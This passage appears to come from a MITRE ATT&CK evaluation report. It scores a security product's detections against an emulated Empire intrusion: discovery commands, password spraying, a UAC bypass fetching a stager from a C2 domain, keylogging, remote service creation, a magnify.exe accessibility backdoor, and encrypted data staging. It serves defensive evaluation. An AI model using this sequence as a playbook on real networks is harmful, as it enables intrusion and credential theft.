(T1071)
Telemetry (Tainted)
  
 
Telemetry showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. Telemetry also showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic.
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe making outgoing connection to 192.168.0.5 tagged with SERVICE_HTTP (Hypertext Transfer Protocol Over TLS/SSL (HTTPS)) (does not count as a detection)
Standard Cryptographic Protocol
(T1032)
Telemetry (Tainted)
  
 
Telemetry showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. Telemetry also showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert.
Telemetry showing powershell.exe making outgoing connection to 192.168.0.5 tagged with SERVICE_HTTP (Hypertext Transfer Protocol Over TLS/SSL (HTTPS)) (tainted by a parent PowerShell alert)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed route.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing route.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment (Tainted)
  
 
The capability enriched ipconfig.exe executing with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed ipconfig.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of ipconfig.exe executing with correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) (tainted by a parent PowerShell alert)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Enrichment (Tainted)
  
 
The capability enriched whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed whoami.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) (tainted by a parent PowerShell alert)
Enrichment of whoami.exe executing with labels for Reconnaissance and Accounts discovery
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Enrichment (Tainted)
  
 
The capability enriched qprocess.exe executing as Reconnaissance and Local process discovery as well as the correct ATT&CK Technique (Process Discovery) and Tactic (Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed qprocess.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of qprocess.exe executing with correct ATT&CK Technique (Process Discovery) and Tactic (Discovery) (tainted by a parent PowerShell alert)
Enrichment of qprocess.exe executing with labels for Reconnaissance and Local process discovery
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Services Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (System Services Discovery) and Technique (Discovery)
Process tree showing alerted net.exe with correct ATT&CK Technique (System Service Discovery) (tainted by a parent PowerShell alert)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a malicious command, which was identified as the Invoke-WinEnum function. The alert also identified the PowerShell commands as suspicious and were tagged with the correct ATT&CK Technique (PowerShell) and Tactic (Execution). The alert was tainted by a parent PowerShell alert.
Telemetry (Tainted)
  
 
Telemetry showed the PowerShell Script module (.psm1) being written to the temp folder. The telemetry was tainted by a parent PowerShell alert.
Specific Behavior alert for Malicious use of PowerShell (tainted by a parent PowerShell alert)
Specific Behavior alert for a PowerShell Malicious command, identified as the Invoke-WinEnum function
Telemetry showing the temp write of the psm1 script module (tainted by a parent PowerShell alert)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Telemetry (Tainted)
  
 
Telemetry showed the decoded powershell.exe function to gather clipboard data. The telemetry was tainted by a parent PowerShell alert..
Telemetry of the PowerShell function to gather clipboard data (tainted by a parent PowerShell alert)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
  
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
  
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment (Tainted)
  
 
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enriched alert for netstat.exe labeled with Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent PowerShell alert)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Permission Groups Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Account Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Remote System Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (System Network Connections Discovery) and Technique (Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment (Tainted)
  
 
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment showing netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent PowerShell alert)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing reg.exe with command-line arguments (tainted by a parent PowerShell alert)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed an integrity level change from medium to high for powershell.exe, which is indicative of bypass UAC. The telemetry was tainted by a parent Malicious use of PowerShell alert.
Telemetry showing powershell.exe executing with medium process integrity (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe executing with high process integrity (tainted by a parent PowerShell alert)
Parent alert generated for malicious use of PowerShell
Commonly Used Port
(T1043)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed powershell.exe making a network connection over port 8080. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for powershell.exe mapped to the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) (tainted by a parent PowerShell alert)
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
Remote File Copy
(T1105)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated based on the downloading and execution of wdbypass, identified as Fileless malware, from freegoogleadsenseinfo.com (C2 domain) over port 8080. The alert also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert
Specific Behavior alert for Download & execute of the wdbypass file
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
Standard Application Layer Protocol
(T1071)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Standard Application Layer Protocol). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with a HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert.
Specific Behavior alert for powershell.exe mapped to the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
Indicator of Compromise
  
An Indicator of Compromise alert was generated based on the execution of a malicious command in PowerShell named Get-Keystrokes.
Telemetry
  
Telemetry showed modloads associated with the execution of a keylogger.
Indicator of Compromise alert for Malicious Command Get-Keystrokes 
Telemetry showing modloads associated with a keylogger
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure. 
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Enrichment (Tainted)
  
 
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution with related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Frieda with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Bob with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution with related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Frieda with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Bob with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert of net.exe execution with correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Valid Accounts
(T1078)
Enrichment (Tainted)
  
 
The capability enriched a logon attempt via net.exe, using the valid credentials of user Kmitnick, with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of a logon attempt via net.exe using the valid credentials of user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Brute Force
(T1110)
Enrichment (Tainted)
  
 
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe conducting suspicious activity (tainted by a parent PowerShell alert)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert of net.exe execution with correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Process tree showing alert net.exe execution (tainted by a parent PowerShell alert)
Valid Accounts
(T1078)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe conducting suspicious activity (tainted by a parent PowerShell alert)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file write of autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing file write of autoupdate.vbs (tainted by a parent PowerShell alert, listed as Owner process)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing autoupdate.vbs though wscript.exe. The telemetry was tainted by a parent PowerShell alert based on a malicious Invoke-RunAs command.
Telemetry showing cmd.exe executing autoupdate.vbs though wscript.exe (tainted by a parent PowerShell alert)
Parent alert on Malicious PowerShell Command (Invoke-RunAs)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed file events for the write of update.vbs to Creeper (10.0.0.4). The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry of file events for write of update.vbs to Creeper (10.0.0.4) (tainted by a parent PowerShell alert, listed as Owner process)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe execution with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry of sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for the unconventional creation of a new service with the correct ATT&CK Technique (New Service) and Tactic (Persistence, Privilege Escalation). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed sc.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for unconventional new service with correct ATT&CK Technique (New Service) and Tactics (Persistence, Privilege Escalation) (tainted by a parent PowerShell alert)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing the update.vbs from the Adobe Flash Updater service. Telemetry also showed sc.exe executing the service. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing cmd.exe executing update.vbs
Telemetry showing sc.exe executing the service (tainted by a parent PowerShell alert)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled. The telemetry was tainted by a parent PowerShell alert.
Telemetry of reg.exe executing with command-line arguments (tainted by a parent PowerShell alert)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry of reg.exe executing with command-line arguments (tainted by a parent PowerShell alert)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for takeown.exe performing activity related to swapping an accessibility features binary. The telemetry was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed takeown.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for takeown.exe performing activity related to swapping an accessibility features binary (tainted by a parent PowerShell alert)
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed icacls.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing icacls.exe executing  with command-line arguments (tainted by a parent PowerShell alert)
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
  
 
Telemetry showed creation and file write events for magnify.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing creation and write events for magnify.exe (tainted by a parent PowerShell alert, listed as Owner process)
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
  
 
Telemetry showed creation of the .vsdx file in the Recycle Bin.  The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry of file create/write of vsdx (tainted by a parent PowerShell alert, listed as Owner process)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed that recycler.exe was WinRAR via file metadata. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe identified as WinRAR via file metadata (tainted by a parent PowerShell alert)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing file create/write of recycler.exe (tainted by a parent PowerShell alert, listed as Owner process)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
Data Encrypted
(T1022)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
